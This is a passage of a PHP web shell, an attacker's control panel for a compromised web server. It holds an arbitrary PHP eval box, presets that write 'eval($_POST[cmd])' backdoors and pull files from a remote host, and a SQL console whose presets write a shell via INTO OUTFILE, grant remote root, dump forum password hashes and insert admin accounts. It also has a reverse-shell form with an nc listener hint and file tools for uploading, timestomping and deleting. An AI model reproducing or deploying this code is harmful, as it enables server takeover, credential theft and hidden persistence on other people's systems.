array(\'/(VBScript\\\\.Encode|WScript\\\\.shell|Shell\\\\.Application|Scripting\\\\.FileSystemObject)+/i\', \'/(eval|execute)+(.*)(request|session)+\\\\s*\\\\((.*)\\\\)/i\', \'/(eval|execute)+(.*)request.item\\\\s*\\\\[(.*)\\\\]/i\', \'/request\\\\s*\\\\((.*)\\\\)(.*)(eval|execute)+\\\\s*\\\\((.*)\\\\)/i\', \'/\\\\<script\\\\s*runat\\\\s*\\\\=(.*)server(.*)\\\\>(.*)\\\\<\\\\/script\\\\>/i\', \'/Load\\\\s*\\\\((.*)Request/i\', \'/StreamWriter\\\\(Server\\\\.MapPath(.*)\\\\.Write\\\\(Request/i\'), \'jsp\' => array(\'/(eval|execute)+(.*)(request|session)+\\\\s*\\\\((.*)\\\\)/i\', \'/(eval|execute)+(.*)request.item\\\\s*\\\\[(.*)\\\\]/i\', \'/request\\\\s*\\\\((.*)\\\\)(.*)(eval|execute)+\\\\s*\\\\((.*)\\\\)/i\', \'/Runtime\\\\.getRuntime\\\\(\\\\)\\\\.exec\\\\((.*)\\\\)/i\', \'/FileOutputStream\\\\(application\\\\.getRealPath(.*)request/i\'));\n            flush();\n            ob_flush();\n            echo \'<div style="padding:5px;background:#F8F8F8;text-align:left;">\';\n            $isread = antivirus(strdir($scandir . \'/\'), $typearr, $matches, $nowdir);\n            echo \'<p>\' . ($isread ? \'<h2>Scan complete</h2>\' : \'<h1>Scan failed</h1>\') . \'</p></div>\';\n        }\n        break;\n    case "phpeval":\n        if (isset($_POST[\'phpcode\'])) {\n            $phpcode = chop($_POST[\'phpcode\']);\n            ob_start();\n            if (substr($phpcode, 0, 2) == \'<?\' && substr($phpcode, -2) == \'?>\') {\n                @eval(\'?>\' . $phpcode . \'<?php \');\n            } else {\n                @eval($phpcode);\n            }\n            $out = ob_get_contents();\n            ob_end_clean();\n        } else {\n            $phpcode = \'phpinfo();\';\n            $out = \'Result Program\';\n        }\n        echo base64_decode(\'PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmZ1bmN0aW9uIHJ1bmNvZGUob2JqbmFtZSkge3ZhciB3aW5uYW1lID0gd2luZG93Lm9wZW4oJycsIl9ibGFuayIsJycpO3ZhciBvYmogPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZChvYmpuYW1lKTt3aW5uYW1lLmRvY3VtZW50Lm9wZW4oJ3RleHQvaHRtbCcsJ3JlcGxhY2UnKTt3aW5uYW1lLm9wZW5lciA9IG51bGw7d2lubmFtZS5kb2N1bWVudC53cml0ZShvYmoudmFsdWUpO3dpbm5hbWUuZG9jdW1lbnQuY2xvc2UoKTt9PC9zY3JpcHQ+\');\n        echo \'<div class="msgbox">\' . $msg . \'</div>\';\n        echo \'<form method="POST">\';\n        subeval();\n        echo \'<input type="hidden" name="go" id="go" value="phpeval">\';\n        echo \'<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">\' . htmlspecialchars($phpcode) . \'</textarea></p><p>\';\n        echo \'<select onchange="$(\\\'phpcode\\\').value=options[selectedIndex].value">\';\n        echo \'<option>---Common Code---</option>\';\n        echo \'<option value="echo readfile(\\\'C:/web/haxor.php\\\');">Read file</option>\';\n        echo \'<option value="$fp=fopen(\\\'C:/web/haxor.php\\\',\\\'w\\\');echo fputs($fp,\\\'<?php eval($_POST[cmd]);?>\\\')?\\\'Success!\\\':\\\'Fail!\\\';fclose($fp);">Write file</option>\';\n        echo \'<option value="echo copy(\\\'C:/web/mi77i.php\\\',\\\'C:/web/haxor.php\\\')?\\\'Success!\\\':\\\'Fail!\\\';">Copy files</option>\';\n        echo \'<option value="echo chmod(\\\'C:/web/mi77i.php\\\',0777)?\\\'Success!\\\':\\\'Fail!\\\';">Modify properties</option>\';\n        echo \'<option value="echo file_put_contents(\\\'\' . THISDIR . \'cmd.exe\\\', file_get_contents(\\\'http://hax.or.id/indo.txt\\\'))?\\\'Success!\\\':\\\'Fail!\\\';">Remote download</option>\';\n        echo \'<option value="print_r($_SERVER);">Environment variable</option>\';\n        echo \'</select> \';\n        echo \'<input type="submit" style="width:80px;" value="Go"></p></div>\';\n        echo \'</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">\' . htmlspecialchars($out) . \'</textarea></p><p><input type="button" value="Run in HTML" onclick="runcode(\\\'evalcode\\\')"></p></div>\';\n        break;\n    case "sql":\n        if (!empty($_POST[\'sqlhost\']) && !empty($_POST[\'sqluser\']) && !empty($_POST[\'names\'])) {\n            $type = $_POST[\'type\'];\n            $sqlhost = $_POST[\'sqlhost\'];\n            $sqluser = $_POST[\'sqluser\'];\n            $sqlpass = $_POST[\'sqlpass\'];\n            $sqlname = $_POST[\'sqlname\'];\n            $sqlcode = $_POST[\'sqlcode\'];\n            $names = $_POST[\'names\'];\n            switch ($type) {\n                case "PostgreSql":\n                    if (function_exists(\'pg_close\')) {\n                        if (strstr($sqlhost, \':\')) {\n                            $array = explode(\':\', $sqlhost);\n                            $sqlhost = $array[0];\n                            $sqlport = $array[1];\n                        } else {\n                            $sqlport = 5432;\n                        }\n                        $dbconn = @pg_connect("host={$sqlhost} port={$sqlport} dbname={$sqlname} user={$sqluser} password={$sqlpass}");\n                        if ($dbconn) {\n                            $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n                            pg_query(\'set client_encoding=\' . $names);\n                            $result = pg_query($sqlcode);\n                            if ($result) {\n                                $msg .= \'<h2> - SQL executed successfully</h2>\';\n                                while ($array = pg_fetch_array($result)) {\n                                    $rows[] = $array;\n                                }\n                            } else {\n                                $msg .= \'<h1> - SQL execution failed</h1>\';\n                                $rows = array(\'error\' => pg_result_error($result));\n                            }\n                            pg_free_result($result);\n                        } else {\n                            $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n                        }\n                        @pg_close($dbconn);\n                    } else {\n                        $msg = \'<h1>Not support\' . $type . \'</h1>\';\n                    }\n                    break;\n                case "MsSql":\n                    if (function_exists(\'mssql_close\')) {\n                        $dbconn = @mssql_connect($sqlhost, $sqluser, $sqlpass);\n                        if ($dbconn) {\n                            $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n                            mssql_select_db($sqlname, $dbconn);\n                            $result = mssql_query($sqlcode);\n                            if ($result) {\n                                $msg .= \'<h2> - SQL executed successfully</h2>\';\n                                while ($array = mssql_fetch_array($result)) {\n                                    $rows[] = $array;\n                                }\n                            } else {\n                                $msg .= \'<h1> - SQL execution failed</h1>\';\n                            }\n                            @mssql_free_result($result);\n                        } else {\n                            $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n                        }\n                        @mssql_close($dbconn);\n                    } else {\n                        $msg = \'<h1>Not support\' . $type . \'</h1>\';\n                    }\n                    break;\n                case "Oracle":\n                    if (function_exists(\'oci_close\')) {\n                        $conn = @oci_connect($sqluser, $sqlpass, $sqlhost . \'/\' . $sqlname);\n                        if ($conn) {\n                            $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n                            $stid = oci_parse($conn, $sqlcode);\n                            oci_execute($stid);\n                            if ($stid) {\n                                $msg .= \'<h2> - SQL executed successfully</h2>\';\n                                while ($array = oci_fetch_array($stid, OCI_ASSOC)) {\n                                    $rows[] = $array;\n                                }\n                            } else {\n                                $msg .= \'<h1> - SQL execution failed</h1>\';\n                                $e = oci_error();\n                                $rows = array(\'error\' => $e[\'message\']);\n                            }\n                            oci_free_statement($stid);\n                        } else {\n                            $e = oci_error();\n                            $rows = array(\'error\' => $e[\'message\']);\n                            $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n                        }\n                        @oci_close($conn);\n                    } else {\n                        $msg = \'<h1>Not support\' . $type . \'</h1>\';\n                    }\n                    break;\n                case "MySql":\n                    if (function_exists(\'mysql_close\')) {\n                        $conn = mysql_connect(strstr($sqlhost, \':\') ? $sqlhost : $sqlhost . \':3306\', $sqluser, $sqlpass, $sqlname);\n                        if ($conn) {\n                            $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n                            if (substr($sqlcode, 0, 7) == \'t00lsa\') {\n                                $array = array();\n                                $data = \'\';\n                                $i = 0;\n                                preg_match_all(\'/t00lsa\\\\s*\\\'(.*)\\\'\\\\s*t00lsb\\\\s*\\\'(.*)\\\'\\\\s*t00lsc\\\\s*\\\'(.*)\\\'\\\\s*t00lsfile\\\\s*\\\'(.*)\\\'/i\', $sqlcode, $array);\n                                if ($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) {\n                                    mysql_select_db($array[1][0], $conn);\n                                    mysql_query(\'set names \' . $names, $conn);\n                                    $spidercode = \'select \' . $array[3][0] . \' from `\' . $array[2][0] . \'`;\';\n                                    $result = mysql_query($spidercode, $conn);\n                                    if ($result) {\n                                        while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {\n                                            $data .= join(\' |x| \', $row) . "\\r\\n";\n                                            $i++;\n                                        }\n                                        if ($data) {\n                                            $file = strdir($array[4][0]);\n                                            $msg .= filew($file, $data, \'w\') ? \'<h2> - Successfully off the DB</h2>\' : \'<h1> - Failed to export file</h1>\';\n                                            $rows = array(\'file\' => $file, size(filesize($file)) => \'Total acquisition\' . $i . \'Article data\');\n                                        } else {\n                                            $msg .= \'<h1> - No data</h1>\';\n                                        }\n                                    } else {\n                                        $msg .= \'<h1> - SQL execution failed</h1>\';\n                                        $rows = array(\'errno\' => mysql_errno(), \'error\' => mysql_error());\n                                    }\n                                } else {\n                                    $msg .= \'<h1> - Off-database statement error</h1>\';\n                                }\n                            } elseif (!empty($sqlcode)) {\n                                mysql_select_db($sqlname, $conn);\n                                mysql_query(\'set names \' . $names, $conn);\n                                $result = mysql_query($sqlcode, $conn);\n                                if ($result) {\n                                    $msg .= \'<h2> - SQL executed successfully</h2>\';\n                                    while ($array = mysql_fetch_array($result, MYSQL_ASSOC)) {\n                                        $rows[] = $array;\n                                    }\n                                } else {\n                                    $msg .= \'<h1> - SQL execution failed</h1>\';\n                                    $rows = array(\'errno\' => mysql_errno(), \'error\' => mysql_error());\n                                }\n                            }\n                            mysql_free_result($result);\n                        } else {\n                            $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n                            $rows = array(\'errno\' => mysql_errno(), \'error\' => mysql_error());\n                        }\n                        mysql_close($conn);\n                    } else {\n                        $msg = \'<h1>Not Support\' . $type . \'</h1>\';\n                    }\n                    break;\n            }\n        } else {\n            $type = \'MySql\';\n            $sqlhost = \'localhost:3306\';\n            $sqluser = \'root\';\n            $sqlpass = \'123456\';\n            $sqlname = \'mysql\';\n            $sqlcode = \'select version();\';\n            $names = \'gbk\';\n        }\n        echo \'<div class="msgbox">\' . $msg . \'</div>\';\n        echo \'<form method="POST">\';\n        subeval();\n        echo \'<input type="hidden" name="go" id="go" value="sql">\';\n        echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n        echo \'<tr><td>Support type</td><td>\';\n        $dbs = array(\'MySql\', \'MsSql\', \'Oracle\', \'PostgreSql\');\n        foreach ($dbs as $dbname) {\n            echo \'<label><input type="radio" name="type" value="\' . $dbname . \'"\' . ($type == $dbname ? \' checked\' : \'\') . \'>\' . $dbname . \'</label> \';\n        }\n        echo \'</td></tr><tr><td>Connection</td><td>Address <input type="text" name="sqlhost" style="width:188px;" value="\' . $sqlhost . \'"> \';\n        echo \'User <input type="text" name="sqluser" style="width:108px;" value="\' . $sqluser . \'"> \';\n        echo \'Password <input type="text" name="sqlpass" style="width:108px;" value="\' . $sqlpass . \'"> \';\n        echo \'DB Name <input type="text" name="sqlname" style="width:108px;" value="\' . $sqlname . \'"></td></tr>\';\n        echo \'<tr><td>Statement<br>\';\n        echo \'<select onchange="$(\\\'sqlcode\\\').value=options[selectedIndex].value">\';\n        echo \'<option value="select version();">---Statement set---</option>\';\n        echo \'<option value="select \\\'<?php eval ($_POST[cmd]);?>\\\' into outfile \\\'D:/web/shell.php\\\';">Write file</option>\';\n        echo \'<option value="GRANT ALL PRIVILEGES ON *.* TO \\\'\' . $sqluser . \'\\\'@\\\'%\\\' IDENTIFIED BY \\\'\' . $sqlpass . \'\\\' WITH GRANT OPTION;">Open external connection</option>\';\n        echo \'<option value="show variables;">System variable</option>\';\n        echo \'<option value="create database haxor;">Create database</option>\';\n        echo \'<option value="create table `haxor` (`id` INT(10) NOT NULL ,`user` VARCHAR(32) NOT NULL ,`pass` VARCHAR(32) NOT NULL) TYPE = MYISAM;">Create data table</option>\';\n        echo \'<option value="show databases;">Show database</option>\';\n        echo \'<option value="show tables from `\' . $sqlname . \'`;">Show data sheet</option>\';\n        echo \'<option value="show columns from `haxor`;">Show table structure</option>\';\n        echo \'<option value="drop table `haxor`;">Delete data table</option>\';\n        echo \'<option value="select username,password,salt,email from `pre_ucenter_members` limit 0,30;">Display field</option>\';\n        echo \'<option value="insert into `admin` (`user`,`pass`) values (\\\'haxor\\\', \\\'f1a81d782dea6a19bdca383bffe68452\\\');">Insert data</option>\';\n        echo \'<option value="update `admin` set `user` = \\\'mi77i\\\',`pass` = \\\'50de237e389600acadbeda3d6e6e0b1f\\\' where `user` = \\\'haxor\\\' and `pass` = \\\'f1a81d782dea6a19bdca383bffe68452\\\' limit 1;">Change data</option>\';\n        echo \'<option value="t00lsa \\\'discuzx25\\\' t00lsb \\\'pre_ucenter_members\\\' t00lsc \\\'username,password,salt,email\\\' t00lsfile \\\'\' . THISDIR . \'out.txt\\\';">Off the DB (MySql)</option>\';\n        echo \'</select>\';\n        echo \'</td><td><textarea name="sqlcode" id="sqlcode" style="width:680px;height:80px;">\' . htmlspecialchars($sqlcode) . \'</textarea></td></tr>\';\n        echo \'<tr><td>Action</td><td><select name="names">\';\n        $charsets = array(\'gbk\', \'utf8\', \'big5\', \'latin1\', \'cp866\', \'ujis\', \'euckr\', \'koi8r\', \'koi8u\');\n        foreach ($charsets as $charset) {\n            echo \'<option value="\' . $charset . \'"\' . ($names == $charset ? \' selected\' : \'\') . \'>\' . $charset . \'</option>\';\n        }\n        echo \'</select> <input type="submit" style="width:80px;" value="Go"></td></tr>\';\n        echo \'</table></form>\';\n        if ($rows) {\n            echo \'<pre style="padding:5px;background:#F8F8F8;text-align:left;">\';\n            ob_start();\n            print_r($rows);\n            $out = ob_get_contents();\n            ob_end_clean();\n            if (preg_match(\'~[\\\\x{4e00}-\\\\x{9fa5}]+~u\', $out) && function_exists(\'iconv\')) {\n                $out = @iconv(\'UTF-8\', \'GB2312//IGNORE\', $out);\n            }\n            echo htmlspecialchars($out);\n            echo \'</pre>\';\n        }\n        break;\n    case "backshell":\n        if (!empty($_POST[\'backip\']) && !empty($_POST[\'backport\'])) {\n            $backip = $_POST[\'backip\'];\n            $backport = $_POST[\'backport\'];\n            $temp = $_POST[\'temp\'] ? $_POST[\'temp\'] : \'/tmp\';\n            $type = $_POST[\'type\'];\n            $msg = backshell($backip, $backport, $temp, $type);\n        } else {\n            $backip = $_SERVER[\'REMOTE_ADDR\'];\n            $backport = \'443\';\n            $temp = \'/tmp\';\n            $type = \'pl\';\n        }\n        echo \'<div class="msgbox">\' . $msg . \'</div>\';\n        echo \'<form method="POST">\';\n        subeval();\n        echo \'<input type="hidden" name="go" id="go" value="backshell">\';\n        echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n        echo \'<tr><td>Bind address</td><td><input type="text" name="backip" style="width:268px;" value="\' . $backip . \'"> (Your ip)</td></tr>\';\n        echo \'<tr><td>Bind port</td><td><input type="text" name="backport" style="width:268px;" value="\' . $backport . \'"> (nc -vvlp \' . $backport . \')</td></tr>\';\n        echo \'<tr><td>Temporary directory</td><td><input type="text" name="temp" style="width:268px;" value="\' . $temp . \'"> (Only Linux)</td></tr>\';\n        echo \'<tr><td>Rebound method</td><td>\';\n        $types = array(\'pl\' => \'Perl\', \'py\' => \'Python\', \'c\' => \'C-bin\', \'pcntl\' => \'Pcntl\', \'php\' => \'PHP\', \'phpwin\' => \'PHP-WS\');\n        foreach ($types as $key => $name) {\n            echo \'<label><input type="radio" name="type" value="\' . $key . \'"\' . ($key == $type ? \' checked\' : \'\') . \'>\' . $name . \'</label> \';\n        }\n        echo \'</td></tr><tr><td>Action</td><td><input type="submit" style="width:80px;" value="Go"></td></tr>\';\n        echo \'</table></form>\';\n        break;\n    case "edit":\n    case "editor":\n        $file = strdir($_POST[\'godir\'] . \'/\' . $_POST[\'govar\']);\n        $iconv = function_exists(\'iconv\');\n        if (!file_exists($file)) {\n            $msg = \'[Create new file]\';\n        } else {\n            $code = filer($file);\n            $chst = \'Default\';\n            if (preg_match(\'~[\\\\x{4e00}-\\\\x{9fa5}]+~u\', $code) && $iconv) {\n                $chst = \'utf-8\';\n                $code = @iconv(\'UTF-8\', \'GB2312//IGNORE\', $code);\n            }\n            $size = size(filesize($file));\n            $msg = \'[File Permission: \' . substr(decoct(fileperms($file)), -4) . \'] [File size: \' . $size . \'] [File encoding: \' . $chst . \']\';\n        }\n        echo base64_decode(\'PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==\');\n        echo \'<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="Find content" onclick="search($(\\\'keyword\\\').value);"> - \' . $msg . \'</div>\';\n        echo \'<form name="editfrm" id="editfrm" method="POST">\';\n        subeval();\n        echo \'<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">\';\n        echo \'<input type="hidden" name="dir" id="dir" value="\' . dirname($file) . \'">\';\n        echo \'<div class="actall">File <input type="text" name="filename" value="\' . $file . \'" style="width:528px;"> \';\n        if ($iconv) {\n            echo \'Coding <select name="tostr">\';\n            $selects = array(\'normal\' => \'Default\', \'utf\' => \'utf-8\');\n            foreach ($selects as $var => $name) {\n                echo \'<option value="\' . $var . \'"\' . ($name == $chst ? \' selected\' : \'\') . \'>\' . $name . \'</option>\';\n            }\n            echo \'</select>\';\n        }\n        echo \'</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">\' . htmlspecialchars($code) . \'</textarea></div></form>\';\n        echo \'<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\\\'editfrm\\\').submit();" value="Save" style="width:80px;"> \';\n        echo \'<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="\' . dirname($file) . \'">\';\n        subeval();\n        echo \'<input type="button" onclick="$(\\\'backfrm\\\').submit();" value="Back" style="width:80px;"></form></div>\';\n        break;\n    case "upfiles":\n        $updir = isset($_POST[\'updir\']) ? $_POST[\'updir\'] : $_POST[\'godir\'];\n        $msg = \'[Maximum upload file \' . get_cfg_var("upload_max_filesize") . \'] [POST maximum submitted data \' . get_cfg_var("post_max_size") . \']\';\n        $max = 10;\n        if (isset($_FILES[\'uploads\']) && isset($_POST[\'renames\'])) {\n            $uploads = $_FILES[\'uploads\'];\n            $msgs = array();\n            for ($i = 1; $i < $max; $i++) {\n                if ($uploads[\'error\'][$i] == UPLOAD_ERR_OK) {\n                    $rename = $_POST[\'renames\'][$i] == \'\' ? $uploads[\'name\'][$i] : $_POST[\'renames\'][$i];\n                    $filea = $uploads[\'tmp_name\'][$i];\n                    $fileb = strdir($updir . \'/\' . $rename);\n                    $msgs[$i] = fileu($filea, $fileb) ? \'<br><h2>Uploaded successfully \' . $rename . \'</h2>\' : \'<br><h1>Upload failed \' . $rename . \'</h1>\';\n                }\n            }\n        }\n        echo \'<div class="msgbox">\' . $msg . \'</div>\';\n        echo \'<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">\';\n        subeval();\n        echo \'<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">\';\n        echo \'<div class="actall"><p>Upload to directory <input type="text" name="updir" style="width:398px;" value="\' . $updir . \'"></p>\';\n        for ($i = 1; $i < $max; $i++) {\n            echo \'<p>File\' . $i . \' <input type="file" name="uploads[\' . $i . \']" style="width:300px;"> Rename <input type="text" name="renames[\' . $i . \']" style="width:128px;"> \' . $msgs[$i] . \'</p>\';\n        }\n        echo \'</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\\\'upsfrm\\\').submit();" value="Upload" style="width:80px;"> \';\n        echo \'<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="\' . $updir . \'">\';\n        subeval();\n        echo \'<input type="button" onclick="$(\\\'backfrm\\\').submit();" value="Back" style="width:80px;"></form></div>\';\n        break;\n    default:\n        if (isset($_FILES[\'upfile\'])) {\n            if ($_FILES[\'upfile\'][\'name\'] == \'\') {\n                $msg = \'<h1>Please select file</h1>\';\n            } else {\n                $rename = $_POST[\'rename\'] == \'\' ? $_FILES[\'upfile\'][\'name\'] : $_POST[\'rename\'];\n                $filea = $_FILES[\'upfile\'][\'tmp_name\'];\n                $fileb = strdir($nowdir . $rename);\n                $msg = fileu($filea, $fileb) ? \'<h2>Upload files \' . $rename . \' Success</h2>\' : \'<h1>Upload files \' . $rename . \' Failure</h1>\';\n            }\n        }\n        if (isset($_POST[\'act\'])) {\n            switch ($_POST[\'act\']) {\n                case "a":\n                    if (!$_POST[\'files\']) {\n                        $msg = \'<h1>Please select file \' . $_POST[\'var\'] . \'</h1>\';\n                    } else {\n                        $i = 0;\n                        foreach ($_POST[\'files\'] as $filename) {\n                            $i += @copy(strdir($nowdir . $filename), strdir($_POST[\'var\'] . \'/\' . $filename)) ? 1 : 0;\n                        }\n                        $msg = $msg = $i ? \'<h2>Co-copy \' . $i . \' Files to\' . $_POST[\'var\'] . \'Success</h2>\' : \'<h1>Co-copy \' . $i . \' Files to\' . $_POST[\'var\'] . \'Failure</h1>\';\n                    }\n                    break;\n                case "b":\n                    if (!$_POST[\'files\']) {\n                        $msg = \'<h1>Please select file</h1>\';\n                    } else {\n                        $i = 0;\n                        foreach ($_POST[\'files\'] as $filename) {\n                            $i += @unlink(strdir($nowdir . $filename)) ? 1 : 0;\n                        }\n                        $msg = $i ? \'<h2>Altogether deleted! \' . $i . \' Files succeeded</h2>\' : \'<h1>Altogether deleted! \' . $i . \' Files failed</h1>\';\n                    }\n                    break;\n                case "c":\n                    if (!$_POST[\'files\']) {\n                        $msg = \'<h1>Please select file \' . $_POST[\'var\'] . \'</h1>\';\n                    } elseif (!ereg("^[0-7]{4}\\$", $_POST[\'var\'])) {\n                        $msg = \'<h1>Permision value error</h1>\';\n                    } else {\n                        $i = 0;\n                        foreach ($_POST[\'files\'] as $filename) {\n                            $i += @chmod(strdir($nowdir . $filename), base_convert($_POST[\'var\'], 8, 10)) ? 1 : 0;\n                        }\n                        $msg = $i ? \'<h2>Total \' . $i . \' File modification permission are\' . $_POST[\'var\'] . \'Success</h2>\' : \'<h1>Total \' . $i . \' File modification permission are\' . $_POST[\'var\'] . \'Failure</h1>\';\n                    }\n                    break;\n                case "d":\n                    if (!$_POST[\'files\']) {\n                        $msg = \'<h1>Please select file \' . $_POST[\'var\'] . \'</h1>\';\n                    } elseif (!preg_match(\'/(\\\\d+)-(\\\\d+)-(\\\\d+) (\\\\d+):(\\\\d+):(\\\\d+)/\', $_POST[\'var\'])) {\n                        $msg = \'<h1>Wrong time format \' . $_POST[\'var\'] . \'</h1>\';\n                    } else {\n                        $i = 0;\n                        foreach ($_POST[\'files\'] as $filename) {\n                            $i += @touch(strdir($nowdir . $filename), strtotime($_POST[\'var\'])) ? 1 : 0;\n                        }\n                        $msg = $i ? \'<h2>Total \' . $i . \' Files modified at\' . $_POST[\'var\'] . \'Success</h2>\' : \'<h1>Total \' . $i . \' Files modified at\' . $_POST[\'var\'] . \'Failure</h1>\';\n                    }\n                    break;\n                case "e":\n                    $path = strdir($nowdir . $_POST[\'var\'] . \'/\');\n                    if (file_exists($path)) {\n                        $msg = \'<h1>Directory already exists \' . $_POST[\'var\'] . \'</h1>\';\n                    } else {\n                        $msg = @mkdir($path, 0777) ? \'<h2>Create a directory \' . $_POST[\'var\'] . \' Success</h2>\' : \'<h1>Create a directory \' . $_POST[\'var\'] . \' Failure</h1>\';\n                    }\n                    break;\n                case "f":\n                    $context = array(\'http\' => array(\'timeout\' => 30));\n                    if (function_exists(\'stream_context_create\')) {\n                        $stream = stream_context_create($context);\n                    }\n                    $data = @file_get_contents($_POST[\'var\'], false, $stream);\n                    $filename = array_pop(explode(\'/\', $_POST[\'var\']));\n                    if ($data) {\n                        $msg = filew(strdir($nowdir . $filename), $data, \'wb\') ? \'<h2>Download \' . $filename . \' Success</h2>\' : \'<h1>Download \' . $filename . \' Failure</h1>\';\n                    } else {\n                        $msg = \'<h1>Download failed or download is not supported</h1>\';\n                    }\n                    break;\n                case "rf":\n                    $files = explode(\'|x|\', $_POST[\'var\']);\n                    if (count($files) != 2) {\n                        $msg = \'<h1>Input error</h1>\';\n                    } else {\n                        $msg = @rename(strdir($nowdir . $files[1]), strdir($nowdir . $files[0])) ? \'<h2>Rename \' . $files[1] . \' for \' . $files[0] . \' Success</h2>\' : \'<h1>Rename \' . $files[1] . \' for \' . $files[0] . \' Failure</h1>\';\n                    }\n                    break;\n                case "pd":\n                    $files = explode(\'|x|\', $_POST[\'var\']);\n                    if (count($files) != 2) {\n                        $msg = \'<h1>Input error</h1>\';\n                    } else {\n                        $path = strdir($nowdir . $files[1]);\n                        $msg = @chmod($path, base_convert($files[0], 8, 10)) ? \'<h2>Modify\' . $files[1] . \'Permission is\' . $files[0] . \'Success</h2>\' : \'<h1>Modify\' . $files[1] . \'Permission is\' . $files[0] . \'Failure</h1>\';\n                    }\n                    break;\n                case "edit":\n                    if (isset($_POST[\'filename\']) && isset($_POST[\'filecode\'])) {\n                        if ($_POST[\'tostr\'] == \'utf\') {\n                            $_POST[\'filecode\'] = @iconv(\'GB2312//IGNORE\', \'UTF-8\', $_POST[\'filecode\']);\n                        }\n                        $msg = filew($_POST[\'filename\'], $_POST[\'filecode\'], \'w\') ? \'<h2>Saved successfully \' . $_POST[\'filename\'] . \'</h2>\' : \'<h1>Save failed \' . $_POST[\'filename\'] . \'</h1>\';\n                    }\n                    break;\n                case "deltree":\n                    $deldir = strdir($nowdir . $_POST[\'var\'] . \'/\');\n                    if (!file_exists($deldir)) {\n                        $msg = \'<h1>Total dir \' . $_POST[\'var\'] . \' does not exist</h1>\';\n                    } else {\n                        $msg = deltree($deldir) ? \'<h2>Delete directory \' . $_POST[\'var\'] . \' Success</h2>\' : \'<h1>Delete directory \' . $_POST[\'var\'] . \' failure</h1>\';\n                    }\n                    break;\n            }\n        }\n        $chmod = substr(decoct(fileperms($nowdir)), -4);\n        if (!$chmod) {\n            $msg .= \' - <h1>Cannot read directory</h1>\';\n        }\n        $array = showdir($nowdir);\n        $thisurl = strdir(\'/\' . strtr($nowdir, array(ROOTDIR => \'\')) . \'/\');\n        $nowdir = strtr($nowdir, array(\'\\\'\' => \'%27\', \'"\' => \'%22\'));\n        echo \'<div class="msgbox">\' . $msg . \'</div>\';\n        echo \'<div class="actall"><form name="frm" id="frm" method="POST">\';\n        subeval();\n        echo (is_writable($nowdir) ? \'<h2>Path</h2>\' : \'<h1>Path</h1>\') . \' <input type="text" name="dir" id="dir" style="width:508px;" value="\' . strdir($nowdir . \'/\') . \'"> \';\n        echo \'<input type="button" onclick="$(\\\'frm\\\').submit();" style="width:50px;" value="Go"> \';\n        echo \'<input type="button" onclick="cd(\\\'\' . ROOTDIR . \'\\\');" style="width:68px;" value="Root dir"> \';\n        echo \'<input type="button" onclick="cd(\\\'\' . THISDIR . \'\\\');" style="width:68px;" value="Current dir"> \';\n        echo \'<select onchange="cd(options[selectedIndex].value);">\';\n        echo \'<option>---Special Dir---</option>\';\n        echo \'<option value="C:/RECYCLER/">Win-RECYCLER</option>\';\n        echo \'<option value="C:/$Recycle.Bin/">Win-$Recycle</option>\';\n        echo \'<option value="C:/Program Files/">Win-Program</option>\';\n        echo \'<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option>\';\n        echo \'<option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动/">Win-Startup (CN)</option>\';\n        echo \'<option value="C:/Windows/Temp/">Win-TEMP</option>\';\n        echo \'<option value="/usr/local/">Linux-local</option>\';\n        echo \'<option value="/tmp/">Linux-tmp</option>\';\n        echo \'<option value="/var/tmp/">Linux-var</option>\';\n        echo \'<option value="/etc/ssh/">Linux-ssh</option>\';\n        echo \'</select></form></div><div class="actall">\';\n        echo \'<input type="button" value="New file" 